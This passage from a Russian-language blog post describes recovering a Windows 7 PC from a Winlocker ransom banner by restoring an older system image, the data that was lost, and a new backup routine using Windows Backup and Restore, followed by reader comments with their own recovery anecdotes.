    Ну что, воришки винлокерные, много вы с меня получили? Хрен вам! Трудитесь дальше! Чем меньше вам будут платить бедные несчастные обманутые вами пользователи ПК, отловившие ваши вирусы, тем скорее вы загнетесь. Ибо при капитализме, в котором вы обитаете в Латвии, без денежек вам – крышка! Как говорил К. Маркс: «Призрак бродит по Европе…». Ох, и доберется он до вас, останетесь банкротами, будете всю жизнь на банки работать. Ну ладно, это я так, полтора часа надо же чем-то себя занять.

    Часа через полтора – сообщение, что все готово. Даже как-то скучно. Ни тебе борьбы, ни тебе побед, ни поражений. Просто читаешь, что восстановление системы успешно завершено. И все. То есть, выполнив два действия, загрузив ПК с диска восстановления системы и восстановив затем образ системы месячной давности, мы вернули операционную систему ПК к тому состоянию, которое она имела месяц назад.

    Вот что значит «а у нас с собой было»! Был диск восстановления системы, и была архивная копия образа системы. «Нормально, Григорий! Отлично, Константин» (М.Жванецкий).

    Ну что, загружаем? Пожалуй, да, только бы не забыть перед выключением ПК (перед перезагрузкой ПК) вынуть диск восстановления системы из DVD-устройства. Пока помним, вынимаем диск. «Спасибо тебе, дорогой, ты меня очень выручил!» – это я к диску обращаюсь.

    Да, и еще надо бы отключить внешний жесткий диск с архивными копиями от USB-порта. Это лучше бы сделать не «варварским» методом (когда просто отключаешь диск при работающем ПК), а желательно сделать это при отключенном ПК. Поэтому принимаю решение сначала ПК выключить полностью, и лишь потом начинать загрузку заново. То есть отказываюсь от перезагрузки.

    Итак, ПК выключен. Перед этим вынут DVD-диск восстановления системы. После этого отключен от USB-порта внешний жесткий диск. Можно включать питание и начинать загрузку. Включаем… Ждем… Загрузились без проблем! Windows 7 безукоризненно работает, баннера Винлокера нет и в помине. Ура?!

    Так-то оно так… Windows работает безукоризненно. А данные? Проверяю. Данные на месте, вроде бы. Ура. Проверяю тщательнее и вижу… данные есть, но не все, а только месячной давности. Все новые данные за месяц, который прошел с момента последнего архивирования образа системы, бесследно пропали. Караул! Ограбили! Мы так не договаривались!

    Кто виноват? и Что делать?

    Кто виноват? Почему не сохранились данные? Вернее, почему сохранились только данные месячной давности? Я ведь восстанавливал только систему из образа. Я ведь не восстанавливал данные из архива. По идее, данные должны были сохраниться в неизменном виде.

    Копирование образа системы я делал с помощью сервиса, заложенного в Windows 7 «Архивация и восстановление ». Когда вызываешь эту программу («Пуск» - «Панель управления» - «Архивация и восстановление»), то видишь слева в окне ссылки на действия. Среди них «Создать диск восстановления системы» (этим способом и был создан диск, который помог мне восстановить Windows) и «Создание образа системы» (это мне позволяло каждый месяц записывать на внешний жесткий диск новый образ системы).

    Отдельно в этом сервисе «Архивация и восстановление» стоит «Архивация данных ». Это можно делать не только вручную, но и настраивать его на автоматическое периодическое копирование всех данных пользователя. Этим способом можно копировать не только образ системы (в настройках можно указать автоматическое создание образа системы при каждой архивации данных пользователя), но и остальные данные пользователя, хранящиеся не только на диске C. но и на других дисках ПК.

    Я пользовался этим сервисом, я копировал свои данные. Делал это раз в месяц. Но я ведь не восстанавливал эти данные их архивной копии. Я лишь восстановил образ системы, рассчитывая на то, что все мои данные сохранятся в неизменном виде. Ан нет, данные не сохранились. Почему?

    И что делать? На последний вопрос ответить проще простого: думать надо! А не просто тыкать во все возможные меню и окна сервиса «Архивация и восстановление»! Не думал, тыкал, вот и получил!

    А если подумать? Винни Пух (наш, советский) говорил: «Я думал, думал… Я все понял. Это неправильные пчелы, они дают неправильный мед!». А если подумать, то получается следующее. Все свои данные я хранил на диске C. Чтобы их как-то отделить от остальной системы я создал на диске C: папку с наименованием «D». Затем сделал к этой папке ярлык, который назвал «Disk_D». И все свои данные писал исключительно в эту папку. Своего рода я имел виртуальный диск D:.

    Однако я не учел, что для программы «Архивация и восстановление» такое разделение диска ни о чем не говорит. И эта программа, создавая архивную копию образа системы, помещала в архив не только системные файлы, но и все файлы из папки «D». Потому что она лежала на диске C. Соответственно, при восстановлении системы из образа восстановились не только системные файлы, но и все мои данные. Только были эти данные месячной давности, как и архивная копия образа системы. Думать надо было!

    Итак, кто виноват, понятно. Не я же, конечно, а сервис от Microsoft «Архивация и восстановление» (это, конечно, неудачная шутка!). Вряд ли можно найти кого-то кроме меня, кто был бы виноват в этой ситуации. Думать надо было!

    И что теперь делать? Решил, что надо смириться с потерей данных. Единственное, что можно восстановить – это почту с Яндекса. Здесь все можно восстановить, спасибо Яндексу! Они там все продумали, в отличие от меня! Заходим в почту через браузер. Находим копии ранее скачанных писем в папке «Удаленные». Отмечаем письма за последний месяц и переносим их в папку «Входящие». Выходим из почты. Загружаем Outlook. И через несколько минут все письма за прошедший месяц снова закачаны и видны в папке «Входящие» в программе Outlook.

    А остальное? Увы, мне. Больше я этих данных не увижу. Придется смириться, и считать это потерями в справедливой борьбе с Винлокером и его изощренными (и извращенными) изобретателями. Действительно, извращенцы, раз они всем это приписывают в своих баннерах. «У кого чего болит, тот о том и говорит!» (цитата, не помню чья).

    Что делать дальше?

    Теперь нельзя повторять старые ошибки. Нужен новый план. Он таков:
    1) Разбить диск на два: C: и D: – это раз.

    2) Переписать все мои данные (которые еще остались!) с диска C: (из папки «D») на диск D: – это два.

    3) Заново настроить «Архивацию и восстановление» с учетом новой конфигурации ПК – это три.

    4) И, наконец, сделать архивные копии – это четыре.

    Один. Разбиение жесткого диска на два. Принимаю решение не делать это самостоятельно. Почему? Ведь существуют вполне простые и понятные программы. Но я объясняю это себе тем, что данное действие мне, возможно, придется сделать единственный раз. И заниматься изучением этого – потеря времени. Лучше обращусь к знакомым сисадминам. Обратился – получил обратно комп с разбитым диском. Все мое восстановленное добро осталось на диске C. а диск D: пока остается пустым.

    Два. Переписываю все данные из папки «D» на диске C: на диск D. Здесь тоже все просто и понятно. Только нужно набраться терпения, пока копирование завершится. И еще. Так как я пользуюсь для получения и отправки почты программой Microsoft Outlook, то нужно все файлы, которые создаются этой программой тоже переписать на диск D. Здесь все не совсем просто и не так уж очевидно.

    Надо использовать сервис «Управление файлами данных». Но при желании можно разобраться. Что и делаю. Все, теперь все мои данные находятся на диске D. И в заключение папку «D» с диска C: я стираю (удаляю).

    Три. Для начала форматирую заново внешний жесткий диск, на который писались архивные копии. Зачем? Чтобы все начать «с чистого листа» и проконтролировать, каким образом будут создаваться архивы образа системы и архивы данных. Форматировать надо так, чтобы файловая система на диске была NTFS. Это – обязательное условие для «Архивации и восстановления». Отформатировал.

    Затем вызываю «Архивацию и восстановление» (через «Пуск» и «Панель управления»). Там нажимаю «Изменить параметры». Выбираю свой отформатированный диск в качестве устройства, на которое будет производиться архивное копирование. Жму «Далее». На вопрос «Что следует архивировать?» выбираю «Предоставить мне выбор» (раньше до Винлокера я отвечал «Предоставить выбор Windows (рекомендуется)», но теперь я этому не доверяю!). Жму «Далее».

    Нажимаю галочки против тех данных ПК, которые я собираюсь архивировать:

    • «Архивация данных новых пользователей» (это хранится на диске C:),
    • «Библиотеки пользователя» (это тоже хранится на диске C:),
    • «Локальный диск D:» (это уже мой новый диск с моими данными).

    Напротив «Локальный диск C:» я галочку не ставлю, так как диск C: копируется при создании образа системы.

    И не ставлю галочку против надписи «Включить образ системы дисков». Потому что не хочу, чтобы образы системы копировались при каждом архивировании, я собираюсь это делать и дальше вручную. Жму «Далее».

    Вижу страницу «Проверьте параметры архивации», где выводятся все выбранные мною параметры. Потом жму «Изменить расписание». И устанавливаю правило: копировать еженедельно в указанный день и в указанное время. В это время компьютер должен быть включен, и внешний жесткий диск должен быть к нему подключен. Тогда архивирование указанных мною данных будет произведено автоматически.

    Заканчиваю, нажимая на «Сохранить параметры и выйти». Все, параметры архивации моих данных настроены.

    Четыре. Заново делаю диск восстановления системы. В окне «Архивация и восстановление» жму на «Создать диск восстановления системы». Иду по шагам, вставляю чистый DVD-диск в DVD-устройство, жду какое-то время. И диск восстановления системы готов. Положу его подальше, чтобы потом было поближе найти!

    Вручную делаю архивацию образа системы. Теперь-то я уверен, что в этом образе нет моих данных. Поэтому в дальнейшем я могу образ системы часто не копировать. Потому-то я и исключил создание образа системы из автоматической архивации моих данных. Жму на «Создание образа системы» в окне «Архивация и восстановление».

    Мне предлагается на выбор:

    • записать образ системы на внешний жесткий диск, подключенный к компьютеру,
    • или записать образ системы на диск D:.

    Принимаю решение сделать образ системы дважды, на оба диска. Почему? Чтобы еще хранить образ системы непосредственно на компьютере, и соответственно из этого образа восстанавливать систему, не имея под рукой внешнего жесткого диска.

    Сначала делаю образ системы на диск D. Компьютер «ругается», предупреждает, что я поступаю неправильно, записывая образ системы на тот же физический носитель, на котором находится сама система. Здесь Windows совершенно прав.

    Если «грохнется» мой жесткий диск внутри ПК, то никакая архивная копия системы, расположенная на нем же, мне уже не поможет. Это факт. Но я ведь страхуюсь не от этого, а от очередного Винлокера и очередных безобразий незаконопослушных граждан Евросоюза! А для этого мне вполне подходит диск D: на моем единственном физическом носителе данных, разбитом на две части знакомыми сисадминами.

    Затем копирую образ системы на внешний жесткий диск. Тут уже Windows не ругается. Хоть бы похвалил, что ли! Ан, нет, «молчит, проклятый» (это короткая цитата из фильма «Иван Васильевич меняет профессию»).

    Итак, образы системы сделаны на диск D: и внешний жесткий диск. Остается сделать архивную копию данных. Решаюсь сделать это в автоматическом режиме. Набираюсь терпения, дожидаюсь объявленного дня недели и времени, которые я указал в настройках архивации. Подключаю внешний жесткий диск, и оставляю ПК включенным. И, о счастье, через некоторое время (часа через полтора) на внешнем жестком диске остается архивная копия.

    Надо, Федя, надо.

    Теперь эти действия по архивации образа системы и моих данных я повторяю регулярно. Вручную примерно раз в месяц копирую образ системы (на диск D: и на внешний жесткий диск). И автоматически еженедельно в указанное в настройках время делаю архивную копию данных. Компьютер это делает автоматически, а мне надо только вспомнить, что комп в это время не нужно выключать, и что надо обязательно подключить к нему внешний жесткий диск.

    Если диск заполняется, его можно почистить, удалив наиболее старые копии. Для этого в окне «Архивация и восстановление» есть опция «Управление пространством». Там все удобно, видны все копии, даты их создания, размеры. Можно удалять, хоть все сразу, но лучше не поступать столь опрометчиво. Удаляю только устаревшие архивные копии.

    Теперь действительно «у нас с собой было» (М.Жванецкий). Осталось дождаться очередного Винлокера! А, может, не надо? «Надо, Федя, надо!» – говорил Шурик в кинофильме «Операция Ы».

    А, может, все-таки пронесет? Нет, к сожалению, не пронесет… Как правильно говорят, вопрос не в том, наступит черный день или нет. Вопрос в том, когда именно это произойдет. Хорошая мысль, главное – в тему!

    P.S. Статья закончилась, но можно еще почитать:

    В Грибоедовские времена обычно шло смешивание франзузского языка с «нижегородским». Теперь появилась новая мода. Теперь смешиваем анлийский с тем же «нижегородским». Куда идём, ребята? Кто нас будет уважать, если сами себя не уважаем. Я понимаю, что Сталины и Хрущёвы занимались ЦЕЛЕНАПРАВЛЕННЫМ уничтожением САМЫХ УМНЫХ И САМЫХ ЛУЧШИХ ПРЕДСТАВИТЕЛЕЙ нашей страны РАДИ БРЕДОВОЙ ИДЕИ ВСЕМИРНОГО КОММУНИЗМА. Это привело к тому, что лучшие и ТАЛАНТЛИВЕЙШИЕ люди уезжали из страны в Америку. Зворыкин — изобретатель телевизора. Сикорский — создатель вертолётов. Потому и КОПЬЮТЕРЫ Появились ТАМ. ЗДЕСЬ ЭТО БЫЛО ПОД ЗАПРЕТОМ. Давайте же БАННЕРЫ и ВИНЛОКЕРЫ при общении между собой всё же заменять на русские слова, господа «ЮЗЕРЫ» !
    Валерий Волынский.

    Валерий, конечно, можно говорить и писать «ЭВМ» (электронно-вычислительная машина) вместо «компьютер». Однако в те времена, когда мы были наравне с американцами, под термином «ЭВМ» понимались крупные вычислительные машины, занимающие целые этажи зданий. То, что сейчас именуется «компьютер», тогда вообще не существовало. Т.е. слова и термины появляются вместе с тем, что они собой олицетворяют.
    Все естественные языки (языки человеческого общения) постоянно развиваются — это закон. Чем более употребим язык, тем быстрее он развивается, в нем появляются новые слова и термины. Самым быстроразвивающимся языком на сегодняшний день является английский язык. Причин множество. Но не из-за эмиграции специалистов из России, как может показаться. Языки развиваются по другим законам. В частности, чем больше людей говорит на том или ином языке, тем быстрее он развивается.
    Количество слов и терминов в современном английском языке намного превосходит количество слов и терминов в русском языке. Многие термины английского языка намного точнее отражают те или иные понятия. Не из-за того, что «все сбежали за границу», а потому что английский язык развивается быстрее. Это надо признать.
    Соответственно, опять же по закону развития языков, термины и слова из более развитого языка «перекочевывают» в другие языки. Не только в русский, но и в немецкий, французский, испанский, итальянский и прочие языки. Таковы законы лингвистики. Увы для нас, кто любит свой родной русский язык.

    Зайдя сегодня на сайт Надежды по поводу зловредного Винлокера, хотел что-нибудь ввернуть по этому поводу, как с удивлением обнаружил свой старый коммент… Сейчас уже не помню на каком форуме я читал о сложном системном сбое. Так вот там рекомендовалось отключить ПК полностью от сети питания, чтобы избавиться от него (сбоя). А в случае с баннером, который грозил неисчислимыми бедами в случае
    попытки выключить компьютер, я и прибег к такому радикальному методу.
    Я не спец по вирусам — кто его знает, что он может предпринять, если
    требование будет проигнорировано: ну, заблокирует выключение (нажатие кнопки — это ведь тоже программное действие). Так что вилка
    — это 100 процентное отключение, а вред может быть нанесён не ПК в
    целом, но только ОС, а мы и так уже от неё отказываемся. До сих пор ничего с моим ПК не случалось при пропадании напряжения сети

    Была такая проблема.
    Решал при помощи программы _ Anti WinLocker Live CD_/

    Статья просто супер,безграничное спасибо вам. Надежда,за такую подробную подачу.Хороший приёмчик-эксперимент успеть вставить диск.
    я знаю ещё один, но на практике не пробовала. Под дисководом есть маленькая дырочка и если при выключенном комп ,выпрямленной скрепкой.
    нажать туда. то дисковод откроется

    «Всё очень непросто»\тоже цитата\фильм»Щит и меч» Я не обладаю столь
    обширными знаниями ПК, как автор этой статьи, но восстановление системы
    делаю тоже из образа, как учили тут же, а вот данные восстанавливаю
    способом, случайно подвернувшимся под руку. Как-то, пытался перейти на
    ЛИНУКС, но он у меня «не пошёл», хотел удалить, но места он занимал
    немного и потому остался… Получив от Винлокера угрозу разрушить жёсткий диск, при попытке перезагрузки, или выключения ПК — я тут же
    выдернул вилку из розетки, рассудив, что никакие. локеры не смогут
    рыскать по остановившимся дискам. Затем включил комп и выбрал из меню
    запуск ЛИНУКС, которым и перенёс нужные данные из Виндосистемы на другой раздел. Затем Акронисом переустановил Винду из образа. Времени
    это заняло чуть, и без всяких обломов и терзаний. Только один вопрос
    автору статьи (или не автору) Зачем включать питание ноутбука для
    вставки ДВД-диска — у меня каретка выскакивает при нажатии кнопки…

    СПАСИБО. ТОЖЕ ПОПАДАЛСЯ! НО ВНУК. ПРОСИДЕВ СО СВОИМ НОУТБУЕОМ МИНУТ СОРОК. ВСЁ ЖЕ СУМЕЛ ПОДОБРАТЬ ШИФР И ВСЁ РАЗБЛОКИРОВАЛОСЬ! А КАК ЭТО ДЕЛАЕТСЯ НЕ ЗНАЮ! С УВАЖЕНИЕМ И ОЖИДАНИЕМ НОВЫХ «ЗАМЕЧАТЕЛЬНЫХ УРОКОВ» .НИКИТА.